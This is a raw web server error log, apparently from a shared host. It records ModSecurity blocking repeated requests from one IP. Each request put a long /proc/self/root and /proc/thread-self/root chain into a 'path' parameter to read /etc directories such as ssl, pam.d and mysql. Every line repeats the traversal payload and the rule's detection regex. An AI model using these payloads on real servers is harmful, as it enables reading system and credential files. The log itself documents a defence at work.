https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:07.875244 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:48372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw7zJ3M9BSuKP7CAbjcAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:10.277374 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:48388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw8ta6ubjKNq_cu4ahswAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:11.617412 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:48404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw8_HIg5MgXLBnicPOeQAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:12.944008 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.241.31:48412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw9F1pVZ5mVmJwsFMEHQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:14.263912 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:48416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw9ta6ubjKNq_cu4ahtAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:15.591117 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:48428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw9_qxLDW4GITHUkS0xgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:16.945078 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:48444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw-PXLqtnMIWvjpaJsJQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:18.215703 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:33228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw-hCii7xarUs8iHY3gQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:20.631809 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:33232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw_PqxLDW4GITHUkS00AAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:21.950976 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:33244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw_fqxLDW4GITHUkS01gAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:23.263700 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.241.31:33256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw_11pVZ5mVmJwsFMEJQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:26.143047 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.241.31:33264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxArninkcc-iUj5AowkgAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:27.415219 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:33386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxA-oXxyEfFpUF8f9WlwAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:28.597192 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:33398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxBPHIg5MgXLBnicPOfQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:29.942727 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:33412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxBTJ3M9BSuKP7CAbjewAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:31.270082 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:33424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxB_XLqtnMIWvjpaJsLgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:32.529023 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:33430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxCDJ3M9BSuKP7CAbjfQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:33.915272 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:33432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxCTJ3M9BSuKP7CAbjgQAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:36.278975 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:33446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxDOoXxyEfFpUF8f9WnQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:37.604948 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:43886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxDda6ubjKNq_cu4ah0wAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:41.139427 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:43902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxEbninkcc-iUj5AowrwAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
